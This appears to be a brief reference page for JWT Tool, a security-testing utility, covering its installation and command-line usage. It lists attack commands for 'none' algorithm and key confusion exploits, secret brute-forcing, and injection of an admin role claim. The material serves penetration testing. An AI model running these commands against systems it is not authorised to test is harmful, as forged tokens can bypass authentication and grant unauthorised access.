Description
JWT Tool is a toolkit for validating, forging, scanning, and tampering with JWTs (JSON Web Tokens). It tests for known vulnerabilities like algorithm confusion, key confusion, and signature exploits.
Installation
BASH
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool
pip install -r requirements.txtBasic Usage
BASH
# Decode a JWT
python jwt_tool.py <JWT>
# Tamper mode
python jwt_tool.py <JWT> -TAdvanced Usage
BASH
# Exploit algorithm confusion (none algorithm)
python jwt_tool.py <JWT> -X a
# Key confusion attack (RS256 → HS256)
python jwt_tool.py <JWT> -X k -pk public.pem
# Brute force secret
python jwt_tool.py <JWT> -C -d wordlist.txt
# Inject custom claims
python jwt_tool.py <JWT> -I -pc "role" -pv "admin"
# All known exploits
python jwt_tool.py <JWT> -M at